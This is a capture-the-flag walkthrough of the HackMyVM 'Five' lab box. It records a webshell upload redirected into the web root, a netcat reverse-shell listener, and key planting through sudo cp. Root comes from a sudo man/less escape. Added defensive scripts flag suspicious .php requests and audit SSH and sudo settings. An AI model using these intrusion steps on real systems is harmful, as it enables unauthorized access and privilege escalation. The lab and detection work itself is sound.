HMV-Five

HMV-Five box walkthrough (review)

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.17
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-18 10:47 CST
Nmap scan report for bogon (192.168.112.17)
Host is up (0.0024s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: 403 Forbidden
MAC Address: B6:07:F9:39:F0:32 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 2.39 ms bogon (192.168.112.17)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds

Only port 80 is open, and nmap already turned up the /admin path from robots.txt, so straight on to the web part.

Web enumeration

A plain curl returns 403. I guessed the site might need a specific Host header, so I tried it in a browser.

Still a 403 there, and no hostname shows up anywhere, so on to /admin.
It is a login page, and a failed login produces a visible error message, so I tried brute-forcing it with Burp (bp) first.
Brute-forcing the password for the user admin got nothing.
Let's scan for directories with gobuster instead.

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u http://192.168.112.17/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,jpg,webg,png,js,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.112.17/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,jpg,webg,png,js,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 185] [--> http://192.168.112.17/uploads/]
/admin (Status: 301) [Size: 185] [--> http://192.168.112.17/admin/]
/upload.html (Status: 200) [Size: 346]
/upload.php (Status: 200) [Size: 48]
/robots.txt (Status: 200) [Size: 17]
Progress: 743223 / 1661152 (44.74%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 744172 / 1661152 (44.80%)
===============================================================
Finished
===============================================================

There is an upload.html page here that lets you upload files.

Uploading a one-line PHP webshell, 1.php, succeeds, and the request redirects to upload.php.

The goal now is to find where the uploaded file ended up and connect to it with AntSword (蚁剑).
Capturing the request in Burp shows it is written to the uploads/ directory, but I can't access that directory.

So I delete that path from the request, which makes the file land in the web root instead.
AntSword now connects successfully, so the next step is to spawn a reverse shell from AntSword's virtual terminal.
Since AntSword's virtual terminal is not a real terminal, it can't be used directly as an interactive shell.

Shell obtained; the session below also upgrades it to a full TTY.

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script -qc /bin/bash /dev/null
www-data@five:~/html$ ^Z
zsh: suspended nc -lp 1234

┌──(root㉿kakeru)-[~/tmp]
└─# cat bbb
stty raw -echo; fg

┌──(root㉿kakeru)-[~/tmp]
└─# stty raw -echo; fg
[1] + continued nc -lp 1234
reset
reset: unknown terminal type unknown
Terminal type? xterm
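
The upload chain above (a .php file accepted by upload.php and then requested directly from the web root) leaves a clear trace in the nginx access log. As an added example that is not part of the original writeup, the script below flags requests to .php paths outside the application's own scripts; the log lines are constructed for the demo, and the KNOWN_PHP allowlist is an assumption based on what gobuster found (upload.php and the /admin area).

```sh
#!/bin/sh
# Added example (not from the original writeup): scan nginx access-log lines for
# the pattern this box allowed, a POST to the upload handler followed by requests
# to a .php file that is not one of the application's own scripts.
# The log lines below are constructed; KNOWN_PHP is an assumption based on what
# gobuster found (upload.php and the /admin area).

# Server-side scripts the application legitimately serves. Exported so awk can
# read it from ENVIRON (awk -v would apply escape processing to the backslash).
KNOWN_PHP='^/(upload\.php|admin(/.*)?)$'
export KNOWN_PHP

# Constructed combined-format log: a visit to the form, the upload POST, a hit
# on the uploaded 1.php in the web root, then ordinary traffic.
SAMPLE_LOG='192.168.112.1 - - [18/Feb/2025:10:55:01 +0800] "GET /upload.html HTTP/1.1" 200 346 "-" "Mozilla/5.0"
192.168.112.1 - - [18/Feb/2025:10:55:09 +0800] "POST /upload.php HTTP/1.1" 200 48 "-" "Mozilla/5.0"
192.168.112.1 - - [18/Feb/2025:10:56:30 +0800] "POST /1.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.112.1 - - [18/Feb/2025:10:57:02 +0800] "GET /admin/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.112.1 - - [18/Feb/2025:10:57:10 +0800] "GET /admin/index.php?page=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.112.1 - - [18/Feb/2025:10:57:20 +0800] "GET /robots.txt HTTP/1.1" 200 17 "-" "Mozilla/5.0"'

# Read log lines on stdin. Print the upload POSTs (so the sequence is visible)
# and flag every request to a .php path that is not in KNOWN_PHP.
flag_php_requests() {
    awk '
    BEGIN { known = ENVIRON["KNOWN_PHP"] }
    {
        method = $6; sub(/^"/, "", method)       # "GET  -> GET
        path = $7;   sub(/\?.*/, "", path)       # drop the query string
        when = $4;   sub(/^\[/, "", when)        # [18/Feb/... -> 18/Feb/...
        if (method == "POST" && path == "/upload.php")
            print "upload:     " $1 " " when " " path
        else if (path ~ /\.php$/ && path !~ known)
            print "SUSPICIOUS: " $1 " " when " " method " " path " status " $9
    }'
}

# Number of suspicious requests only (handy for a cron job that alerts on > 0).
count_suspicious() {
    flag_php_requests | grep -c '^SUSPICIOUS'
}

# Demo on the constructed log; real use: flag_php_requests < /var/log/nginx/access.log
printf '%s\n' "$SAMPLE_LOG" | flag_php_requests
```

On the constructed log only the request to /1.php is flagged; /admin/index.php is on the allowlist and the query string is stripped before matching. Adjust KNOWN_PHP to the real application's scripts before running it on a live log.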

Privilege escalation

www-data

First check the sudo rights of the www-data user: it may run cp as another user (melisa).

www-data@five:/var$ sudo -l
Matching Defaults entries for www-data on five:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on five:
(melisa) NOPASSWD: /bin/cp

Looking in that user's home directory there is a .ssh folder, so my first thought was to grab the SSH private key, but this box doesn't have port 22 open.
Checking which ports are listening locally, though, there is a 4444.

www-data@five:/home/melisa$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=384,fd=6))
tcp LISTEN 0 128 127.0.0.1:4444 0.0.0.0:*
tcp LISTEN 0 128 [::]:80 [::]:* users:(("nginx",pid=384,fd=7))

That might work.
I copied the private key over and found that port 4444 does accept SSH logins, but I got permission denied.

www-data@five:/home/melisa$ sudo -u melisa cp /home/melisa/.ssh/id_rsa /tmp
www-data@five:/home/melisa$ cd /tmp
www-data@five:/tmp$ chmod 600 id_rsa
chmod: changing permissions of 'id_rsa': Operation not permitted


www-data@five:/tmp$ ssh melisa@127.0.0.1 -p 4444 -i id_rsa
Could not create directory '/var/www/.ssh'.
The authenticity of host '[127.0.0.1]:4444 ([127.0.0.1]:4444)' can't be established.
ECDSA key fingerprint is SHA256:jWQpYhXQJtOuJfrNjZvNSilLDT7fkbFxeioQzGTBY7Y.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Load key "id_rsa": Permission denied

After reading a writeup I learned that the problem was a missing public key; ssh-keygen can derive the public key from the private key.

www-data@five:/tmp$ ssh-keygen -y -f id_rsa > authorized_keys
Load key "id_rsa": Permission denied

Here id_rsa belongs to melisa, and the www-data user has no permission to read it.
The workaround is to create a file ourselves, which we then have permission on, and use sudo cp to copy the contents into it.

www-data@five:/tmp$ sudo -u melisa /bin/cp /tmp/id_rsa /tmp/id
/bin/cp: cannot create regular file '/tmp/id': Permission denied

www-data@five:/tmp$ chmod 777 id
www-data@five:/tmp$ sudo -u melisa /bin/cp /tmp/id_rsa /tmp/id

www-data@five:/tmp$ ssh-keygen -y -f id > authorized_keys
www-data@five:/tmp$ sudo -u melisa /bin/cp /tmp/authorized_keys /home/melisa/.ssh

The public key is generated and placed in the user's .ssh directory.

Login succeeds.

www-data@five:/tmp$ ssh melisa@127.0.0.1 -p 4444 -i id
Could not create directory '/var/www/.ssh'.
The authenticity of host '[127.0.0.1]:4444 ([127.0.0.1]:4444)' can't be established.
ECDSA key fingerprint is SHA256:jWQpYhXQJtOuJfrNjZvNSilLDT7fkbFxeioQzGTBY7Y.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Linux five 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct 6 03:39:32 2020 from 192.168.1.58
melisa@five:~$
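
The summary's rule of thumb (private key 600, public key 644) and the authorized_keys entry that was written into melisa's .ssh via sudo cp both come down to what is in that directory and who can write it. The script below is an added example, not from the original writeup: it audits a .ssh directory's permissions and lists the keys in authorized_keys so an entry the owner did not add stands out. It assumes GNU coreutils (stat -c), as on the Debian box here.

```sh
#!/bin/sh
# Added example, not part of the original writeup: audit a ~/.ssh directory the
# way the summary describes it (private key 600, public key 644) and list the
# keys in authorized_keys so an unexpected entry stands out.
# Assumes GNU coreutils (stat -c), as on Debian.

# Report permission problems in a .ssh directory. Prints one line per finding.
# Returns 0 when clean, 1 when something is wrong, 2 when the directory is missing.
check_ssh_dir() {
    dir=$1
    rc=0
    sym=$(stat -c '%A' "$dir" 2>/dev/null) || return 2
    # The directory itself should be drwx------ (700): no group/other bits.
    case "$sym" in
        d???------) ;;
        *) echo "$dir: mode is $sym, expected drwx------"; rc=1 ;;
    esac
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        sym=$(stat -c '%A' "$f")
        case "$f" in
            *.pub|*/authorized_keys|*/known_hosts)
                # Public material may be world-readable (644) but must never be
                # writable by group or others (the 6th/9th symbolic positions).
                case "$sym" in
                    ?????w*|????????w*) echo "$f: writable by group/others ($sym)"; rc=1 ;;
                esac ;;
            *)
                # Private keys and config: no group/other bits at all (600 or 400).
                case "$sym" in
                    ????------) ;;
                    *) echo "$f: private file exposed to group/others ($sym)"; rc=1 ;;
                esac ;;
        esac
    done
    return $rc
}

# Print "keytype comment" for every key in an authorized_keys file, skipping
# blank and comment lines. The first field that looks like a key type is used,
# so an options prefix such as command="..." is tolerated.
list_authorized_keys() {
    awk '
    /^[ \t]*#/ { next }
    NF == 0    { next }
    {
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^(sk-)?(ssh-[a-z0-9]+|ecdsa-sha2-nistp[0-9]+)(@openssh\.com)?$/) {
                comment = ""
                for (j = i + 2; j <= NF; j++)
                    comment = comment (j > i + 2 ? " " : "") $j
                print $i, (comment == "" ? "(no comment)" : comment)
                break
            }
        }
    }' "$1"
}

# Usage: sh ssh_audit.sh [dir]   (defaults to ~/.ssh)
main() {
    target=${1:-$HOME/.ssh}
    if check_ssh_dir "$target"; then
        echo "$target: permissions look right"
    fi
    if [ -f "$target/authorized_keys" ]; then
        echo "authorized keys in $target:"
        list_authorized_keys "$target/authorized_keys"
    fi
}
main "$@"
```

Run against melisa's home on this box it would have reported the permission state of each file and printed every authorized key with its comment, which is the quickest way for an owner to notice a key they never added.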

melisa

This user has sudo rights:

melisa@five:~$ sudo -l
Matching Defaults entries for melisa on five:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melisa may run the following commands on five:
(ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm, /bin/clear

This points to the man privilege-escalation technique.

But it errors out:

melisa@five:~$ sudo man man
Your terminal lacks the ability to clear the screen or position the cursor.

man: command exited with status 1: sed -e '/^[[:space:]]*$/{ N; /^[[:space:]]*\n[[:space:]]*$/D; }' | LESS=-ix8RmPm Manual page man(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB\%.. (press h for help or q to quit)$PM Manual page man(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB\%.. (press h for help or q to quit)$ MAN_PN=man(1) pager

From the writeup: the paging mode is different, so it has to be run with less as the pager.

melisa@five:~$ sudo /bin/man -P /usr/bin/less man
WARNING: terminal is not fully functional
- (press RETURN)!//bbiinn//bbaasshh!/bin/bash
root@five:/home/melisa#

This means using less as the pager to view the man manual page; -P specifies the pager.
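
Both sudo -l outputs above (www-data's cp-as-melisa rule and melisa's SETENV NOPASSWD list) are exactly the grants an administrator should be reviewing, and raw sudo -l output is awkward to scan across many hosts. As an added example, not from the original writeup, the function below turns that output into one line per command with its run-as user and tags; the sample inputs are the two outputs captured on the box.

```sh
#!/bin/sh
# Added example, not from the original writeup: turn `sudo -l` output into a
# one-rule-per-line report so NOPASSWD and SETENV grants stand out in an audit.
# The two sample outputs below are the ones captured on the box.

# Read `sudo -l` output on stdin; print "runas tags command" per command.
# Tags collapse to "NOPASSWD" or "password", with "+SETENV" appended when set.
report_sudo_rules() {
    awk '
    /may run the following commands/ { in_rules = 1; next }
    !in_rules || NF == 0 { next }
    {
        line = $0
        sub(/^[ \t]+/, "", line)
        if (line !~ /^\(/) next                      # not a rule line
        runas = line
        sub(/^\(/, "", runas); sub(/\).*/, "", runas)
        sub(/^\([^)]*\)[ \t]*/, "", line)
        tags = ""
        # Leading WORD: tokens are sudoers tags (NOPASSWD:, SETENV:, ...)
        while (match(line, /^!?[A-Z]+:/)) {
            tags = tags substr(line, 1, RLENGTH - 1) " "
            line = substr(line, RLENGTH + 1)
            sub(/^[ \t]+/, "", line)
        }
        flag = (tags ~ /NOPASSWD/) ? "NOPASSWD" : "password"
        if (tags ~ /SETENV/) flag = flag "+SETENV"
        n = split(line, cmds, /,[ \t]*/)              # remaining text: command list
        for (i = 1; i <= n; i++) print runas, flag, cmds[i]
    }'
}

# The www-data output from the box.
SUDO_L_WWW='Matching Defaults entries for www-data on five:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on five:
    (melisa) NOPASSWD: /bin/cp'

# The melisa output from the box.
SUDO_L_MELISA='Matching Defaults entries for melisa on five:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melisa may run the following commands on five:
    (ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm, /bin/clear'

# Demo; real use: sudo -l | report_sudo_rules
printf '%s\n' "$SUDO_L_WWW" | report_sudo_rules
printf '%s\n' "$SUDO_L_MELISA" | report_sudo_rules
```

The report for this box reads "melisa NOPASSWD /bin/cp" and six "ALL NOPASSWD+SETENV" lines; seen that way, a copy command run as another user and a pager-spawning program with an unrestricted environment are easy to pick out of a fleet-wide sweep.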

Summary

Lessons learned: when the directory an upload lands in is not accessible, upload to the web root instead.
Deriving the public key from the private key, and what to watch for when you have cp rights (first create a file you have permission on yourself).
One reason SSH login fails: the port is not open, or there is no matching public key.
When the man privilege escalation runs into problems, specify the pager.

To recap: private key permissions are 600, public key permissions are 644.
Quite a lot learned from this one.